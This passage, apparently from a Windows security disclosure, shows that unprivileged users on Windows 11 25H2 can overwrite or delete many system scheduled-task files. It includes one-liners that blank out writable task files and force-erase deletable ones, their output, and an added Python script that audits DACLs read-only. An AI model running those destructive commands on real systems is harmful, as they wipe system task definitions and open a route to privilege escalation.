C:\Windows\System32\Tasks\Microsoft\Windows\CloudExperienceHost\CreateObjectTask C:\Windows\System32\Tasks\Microsoft\Windows\CloudRestore\Backup C:\Windows\System32\Tasks\Microsoft\Windows\CloudRestore\Backup C:\Windows\System32\Tasks\Microsoft\Windows\CloudRestore\Restore C:\Windows\System32\Tasks\Microsoft\Windows\ConsentUX\UnifiedConsent\UnifiedConsentSyncTask 
C:\Windows\System32\Tasks\Microsoft\Windows\ConsentUX\UnifiedConsent\UnifiedConsentSyncTask C:\Windows\System32\Tasks\Microsoft\Windows\Containers\CmCleanup C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip C:\Windows\System32\Tasks\Microsoft\Windows\Data Integrity Scan\Data Integrity Check And Scan C:\Windows\System32\Tasks\Microsoft\Windows\Data Integrity Scan\Data Integrity Check And Scan C:\Windows\System32\Tasks\Microsoft\Windows\Data Integrity Scan\Data Integrity Scan C:\Windows\System32\Tasks\Microsoft\Windows\Data Integrity Scan\Data Integrity Scan for Crash Recovery C:\Windows\System32\Tasks\Microsoft\Windows\Defrag\ScheduledDefrag C:\Windows\System32\Tasks\Microsoft\Windows\Device Information\Device C:\Windows\System32\Tasks\Microsoft\Windows\Device Information\Device C:\Windows\System32\Tasks\Microsoft\Windows\Device Information\Device User C:\Windows\System32\Tasks\Microsoft\Windows\Device Setup\Driver Recovery on Reboot C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\Scheduled C:\Windows\System32\Tasks\Microsoft\Windows\Diagnosis\UnexpectedCodepath C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DirectXDatabaseUpdater C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DirectXDatabaseUpdater C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DXGIAdapterCache C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DXGIAdapterCache C:\Windows\System32\Tasks\Microsoft\Windows\DirectX\DXGIAdapterCache 
C:\Windows\System32\Tasks\Microsoft\Windows\DiskCleanup\SilentCleanup C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector C:\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver C:\Windows\System32\Tasks\Microsoft\Windows\DiskFootprint\Diagnostics C:\Windows\System32\Tasks\Microsoft\Windows\DiskFootprint\StorageSense C:\Windows\System32\Tasks\Microsoft\Windows\DUSM\dusmtask C:\Windows\System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task C:\Windows\System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task C:\Windows\System32\Tasks\Microsoft\Windows\EDP\EDP Inaccessible Credentials Task C:\Windows\System32\Tasks\Microsoft\Windows\EDP\StorageCardEncryption Task C:\Windows\System32\Tasks\Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh C:\Windows\System32\Tasks\Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh C:\Windows\System32\Tasks\Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh C:\Windows\System32\Tasks\Microsoft\Windows\Feedback\Siuf\DmClient C:\Windows\System32\Tasks\Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload C:\Windows\System32\Tasks\Microsoft\Windows\File Classification Infrastructure\Property Definition Sync C:\Windows\System32\Tasks\Microsoft\Windows\FileHistory\File History (maintenance mode) C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\BootstrapUsageDataReporting C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\GovernedFeatureUsageProcessing C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileConfigs C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures 
C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataFlushing C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataFlushing C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataFlushing C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataReceiver C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\UsageDataReporting C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\OneSettings\RefreshCache C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\OneSettings\RefreshCache C:\Windows\System32\Tasks\Microsoft\Windows\Flighting\OneSettings\RefreshCache C:\Windows\System32\Tasks\Microsoft\Windows\Hotpatch\Monitoring C:\Windows\System32\Tasks\Microsoft\Windows\Hotpatch\Monitoring C:\Windows\System32\Tasks\Microsoft\Windows\Hotpatch\Monitoring C:\Windows\System32\Tasks\Microsoft\Windows\input\InputSettingsRestoreDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\LocalUserSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\MouseSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\PenSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\RemoteMouseSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\RemotePenSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\RemoteTouchpadSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\input\syncpensettings C:\Windows\System32\Tasks\Microsoft\Windows\input\TouchpadSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\RestoreDevice C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\ScanForUpdates C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\ScanForUpdates 
C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\ScanForUpdates C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\ScanForUpdatesAsUser C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\WakeUpAndContinueUpdates C:\Windows\System32\Tasks\Microsoft\Windows\InstallService\WakeUpAndScanForUpdates C:\Windows\System32\Tasks\Microsoft\Windows\International\Synchronize Language Settings C:\Windows\System32\Tasks\Microsoft\Windows\International\Synchronize Language Settings C:\Windows\System32\Tasks\Microsoft\Windows\Kernel\La57Cleanup C:\Windows\System32\Tasks\Microsoft\Windows\LanguageComponentsInstaller\Installation C:\Windows\System32\Tasks\Microsoft\Windows\LanguageComponentsInstaller\ReconcileLanguageResources C:\Windows\System32\Tasks\Microsoft\Windows\Location\WindowsActionDialog C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\WinSAT C:\Windows\System32\Tasks\Microsoft\Windows\Management\Autopilot\DetectHardwareChange C:\Windows\System32\Tasks\Microsoft\Windows\Management\Autopilot\DetectHardwareChange C:\Windows\System32\Tasks\Microsoft\Windows\Management\Autopilot\RemediateHardwareChange C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\Cellular C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\Logon C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\Retry C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\RunOnReboot C:\Windows\System32\Tasks\Microsoft\Windows\Maps\MapsToastTask C:\Windows\System32\Tasks\Microsoft\Windows\Maps\MapsUpdateTask C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\AutomaticOfflineMemoryDiagnostic C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents 
C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\ProcessMemoryDiagnosticEvents C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\RunFullMemoryDiagnostic C:\Windows\System32\Tasks\Microsoft\Windows\MUI\LPRemove C:\Windows\System32\Tasks\Microsoft\Windows\Multimedia\SystemSoundsService C:\Windows\System32\Tasks\Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies C:\Windows\System32\Tasks\Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies C:\Windows\System32\Tasks\Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies C:\Windows\System32\Tasks\Microsoft\Windows\NlaSvc\WiFiTask C:\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Background Synchronization C:\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Logon Synchronization C:\Windows\System32\Tasks\Microsoft\Windows\PCRPF\PCR Prediction Framework Firmware Update Task C:\Windows\System32\Tasks\Microsoft\Windows\PerformanceTrace\RequestTrace C:\Windows\System32\Tasks\Microsoft\Windows\PerformanceTrace\WhesvcToast C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Device Install Group Policy C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Device Install Reboot Required C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Device Install Reboot Required C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers C:\Windows\System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem C:\Windows\System32\Tasks\Microsoft\Windows\Printing\EduPrintProv C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrinterCleanupTask C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrintJobCleanupTask C:\Windows\System32\Tasks\Microsoft\Windows\RecoveryEnvironment\VerifyWinRE C:\Windows\System32\Tasks\Microsoft\Windows\ReFsDedupSvc\Initialization 
C:\Windows\System32\Tasks\Microsoft\Windows\Registry\RegIdleBackup C:\Windows\System32\Tasks\Microsoft\Windows\Servicing\OOBEFodSetup C:\Windows\System32\Tasks\Microsoft\Windows\Servicing\StartComponentCleanup C:\Windows\System32\Tasks\Microsoft\Windows\Setup\PITRTask C:\Windows\System32\Tasks\Microsoft\Windows\SharedPC\Account Cleanup C:\Windows\System32\Tasks\Microsoft\Windows\Shell\CreateObjectTask C:\Windows\System32\Tasks\Microsoft\Windows\Shell\FamilySafetyMonitor C:\Windows\System32\Tasks\Microsoft\Windows\Shell\FamilySafetyRefreshTask C:\Windows\System32\Tasks\Microsoft\Windows\Shell\IndexerAutomaticMaintenance C:\Windows\System32\Tasks\Microsoft\Windows\Shell\ThemesSyncedImageDownload C:\Windows\System32\Tasks\Microsoft\Windows\Shell\UpdateUserPictureTask C:\Windows\System32\Tasks\Microsoft\Windows\Shell\UpdateUserPictureTaskContained C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon C:\Windows\System32\Tasks\Microsoft\Windows\SpacePort\SpaceAgentTask C:\Windows\System32\Tasks\Microsoft\Windows\SpacePort\SpaceAgentTask C:\Windows\System32\Tasks\Microsoft\Windows\SpacePort\SpaceManagerTask C:\Windows\System32\Tasks\Microsoft\Windows\SpacePort\SpaceManagerTask C:\Windows\System32\Tasks\Microsoft\Windows\StateRepository\MaintenanceTasks C:\Windows\System32\Tasks\Microsoft\Windows\Storage Tiers Management\Storage Tiers Management Initialization C:\Windows\System32\Tasks\Microsoft\Windows\Storage Tiers Management\Storage Tiers Optimization C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\EnableLicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition C:\Windows\System32\Tasks\Microsoft\Windows\Subscription\LicenseAcquisition 
C:\Windows\System32\Tasks\Microsoft\Windows\Sustainability\PowerGridForecastTask C:\Windows\System32\Tasks\Microsoft\Windows\Sustainability\PowerGridForecastTask C:\Windows\System32\Tasks\Microsoft\Windows\Sustainability\SustainabilityTelemetry C:\Windows\System32\Tasks\Microsoft\Windows\Sysmain\HybridDriveCachePrepopulate C:\Windows\System32\Tasks\Microsoft\Windows\Sysmain\HybridDriveCacheRebalance C:\Windows\System32\Tasks\Microsoft\Windows\Sysmain\ResPriStaticDbSync C:\Windows\System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask C:\Windows\System32\Tasks\Microsoft\Windows\SystemRestore\SR C:\Windows\System32\Tasks\Microsoft\Windows\Task Manager\Interactive C:\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\ForceSynchronizeTime C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\ForceSynchronizeTime C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime C:\Windows\System32\Tasks\Microsoft\Windows\Time Zone\SynchronizeTimeZone C:\Windows\System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig C:\Windows\System32\Tasks\Microsoft\Windows\USB\Usb-Notifications C:\Windows\System32\Tasks\Microsoft\Windows\USB\Usb-Notifications C:\Windows\System32\Tasks\Microsoft\Windows\USB\Usb-Notifications C:\Windows\System32\Tasks\Microsoft\Windows\USB\Usb-Notifications C:\Windows\System32\Tasks\Microsoft\Windows\WCM\WiFiTask C:\Windows\System32\Tasks\Microsoft\Windows\WDI\ResolutionHost C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting 
C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting C:\Windows\System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange C:\Windows\System32\Tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\System32\Tasks\Microsoft\Windows\Wininet\CacheTask C:\Windows\System32\Tasks\Microsoft\Windows\WlanSvc\CDSSync C:\Windows\System32\Tasks\Microsoft\Windows\WlanSvc\MoProfileManagement C:\Windows\System32\Tasks\Microsoft\Windows\WlanSvc\MoProfileManagement C:\Windows\System32\Tasks\Microsoft\Windows\Work Folders\Work Folders Logon Synchronization C:\Windows\System32\Tasks\Microsoft\Windows\Work Folders\Work Folders Maintenance Work C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Device-Join C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Device-Join C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Device-Sync C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Recovery-Check C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Recovery-Check C:\Windows\System32\Tasks\Microsoft\Windows\WwanSvc\NotificationTask C:\Windows\System32\Tasks\Microsoft\Windows\WwanSvc\OobeDiscovery C:\Windows\System32\Tasks\Microsoft\Windows\WwanSvc\OobeDiscovery 
C:\Windows\System32\Tasks\Microsoft\Windows\WwanSvc\OobeDiscovery C:\Windows\System32\Tasks\Microsoft\XblGameSave\XblGameSaveTask
(Optional) Overwrite the task files which your unprivileged user account can clobber and display their access permissions (DACLs) in SDDL notation:
FOR /F "Delims=," %? IN ('SCHTASKS.EXE /QUERY /FO CSV ^| FIND.EXE "\"') DO @(1>NUL: 2>NUL: COPY /Y NUL: "%SystemRoot%\System32\Tasks%~?" && CACLS.EXE "%SystemRoot%\System32\Tasks%~?" /S)
C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\MareBackup "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;BU)(A;;0x1200a9;;;LS)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam "D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;IU)"
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam "D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;IU)"
C:\Windows\System32\Tasks\Microsoft\Windows\File Classification Infrastructure\Property Definition Sync "D:(D;;SD;;;AU)(A;;0x1201bf;;;AU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\InputSettingsRestoreDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\LocalUserSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\MouseSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\PenSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteMouseSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemotePenSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\syncpensettings "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\TouchpadSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrinterCleanupTask "D:P(A;;FA;;;AU)(A;;FA;;;SY)"
C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrintJobCleanupTask "D:P(A;;FA;;;AU)(A;;FA;;;SY)"
C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;BU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;BU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
OUCH²: on this (typical) installation of Windows 11 25H2 unprivileged users can overwrite 15 task files shipped with the system – a malicious actor can instead modify these task files to escalate privileges!
(Optional) Remove the task files which your (or any other) unprivileged user account can remove:
FOR /F "Delims=," %? IN ('SCHTASKS.EXE /QUERY /FO CSV ^| FIND.EXE "\"') DO @(1>NUL: 2>NUL: ERASE /F "%SystemRoot%\System32\Tasks%~?" && ECHO %SystemRoot%\System32\Tasks%~?)
C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\MareBackup
C:\Windows\System32\Tasks\Microsoft\Windows\Input\InputSettingsRestoreDataAvailable
C:\Windows\System32\Tasks\Microsoft\Windows\Input\LocalUserSyncDataAvailable
C:\Windows\System32\Tasks\Microsoft\Windows\Input\MouseSyncDataAvailable
C:\Windows\System32\Tasks\Microsoft\Windows\Input\PenSyncDataAvailable
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteMouseSyncDataAvailable
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemotePenSyncDataAvailable
C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable
C:\Windows\System32\Tasks\Microsoft\Windows\Input\syncpensettings
C:\Windows\System32\Tasks\Microsoft\Windows\Input\TouchpadSyncDataAvailable
C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrinterCleanupTask
C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrintJobCleanupTask
OUCH³: on this (typical) installation of Windows 11 25H2 unprivileged users can delete 12 task files shipped with the system!
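Both findings above (which task files an unprivileged user can overwrite, and which it can also delete) can be derived from the CACLS /S output alone instead of by clobbering or erasing the files. The following Python script is an added example, not part of the original page: it parses each file's SDDL DACL, computes the access an interactive standard user (a member of Everyone, Authenticated Users, Users and INTERACTIVE at once) effectively holds, and classifies every unique task file; the sample input is constructed from the CACLS output shown above, and the SDDL rights table is a subset sufficient for file DACLs.

```python
import re

# SDDL access-right tokens (subset: generic, standard and file-specific rights)
SDDL_RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "CC": 0x001, "DC": 0x002, "LC": 0x004, "SW": 0x008, "RP": 0x010,
    "WP": 0x020, "DT": 0x040, "LO": 0x080, "CR": 0x100,
}
# FILE_WRITE_DATA, GENERIC_WRITE, GENERIC_ALL, WRITE_DAC, WRITE_OWNER: any of these lets the
# holder replace the task file's content (the last two by first rewriting its DACL or owner)
OVERWRITE_MASK = 0x2 | 0x40000000 | 0x10000000 | 0x40000 | 0x80000
DELETE_MASK = 0x10000 | 0x10000000            # DELETE, GENERIC_ALL
# Well-known SID aliases every interactive standard user carries in its token
UNPRIVILEGED = {"WD", "AU", "BU", "IU"}       # Everyone, Authenticated Users, Users, INTERACTIVE

def parse_rights(token):
    """Convert an SDDL rights field ('FA', '0x12019f', 'CCDCLC...') into an access mask."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    mask = 0
    for i in range(0, len(token), 2):
        mask |= SDDL_RIGHTS[token[i:i + 2]]
    return mask

def parse_dacl(sddl):
    """Return [(ace_type, flags, mask, sid), ...] from a 'D:...' SDDL string."""
    m = re.fullmatch(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if not m:
        raise ValueError("not a DACL: " + sddl)
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(2)):
        f = body.split(";")                 # type;flags;rights;object;inherit_object;sid
        aces.append((f[0], f[1], parse_rights(f[2]), f[5]))
    return aces

def unprivileged_access(sddl):
    """Access mask an interactive standard user ends up with: the union of allow ACEs for
    the groups it belongs to, minus every bit a deny ACE for any of those groups removes."""
    allowed = denied = 0
    for ace_type, _flags, mask, sid in parse_dacl(sddl):
        if sid in UNPRIVILEGED:
            if ace_type == "A":
                allowed |= mask
            elif ace_type == "D":
                denied |= mask
    return allowed & ~denied

def audit(cacls_output):
    """Classify each unique task file from 'path "D:..."' lines (CACLS /S output)."""
    findings = {}
    for line in cacls_output.splitlines():
        m = re.match(r'(.*?) "(D:.*)"$', line.strip())
        if m:
            path, sddl = m.groups()
            mask = unprivileged_access(sddl)
            findings[path] = (bool(mask & OVERWRITE_MASK), bool(mask & DELETE_MASK))
    return findings

def counts(findings):
    """(overwritable, deletable) counts over unique task files."""
    return (sum(o for o, _ in findings.values()), sum(d for _, d in findings.values()))

# Constructed sample: the CACLS /S lines shown above, duplicates kept as the FOR loop printed them
SAMPLE = r"""
C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\MareBackup "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;BU)(A;;0x1200a9;;;LS)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam "D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;IU)"
C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam "D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;IU)"
C:\Windows\System32\Tasks\Microsoft\Windows\File Classification Infrastructure\Property Definition Sync "D:(D;;SD;;;AU)(A;;0x1201bf;;;AU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\InputSettingsRestoreDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\LocalUserSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
C:\Windows\System32\Tasks\Microsoft\Windows\Input\MouseSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"
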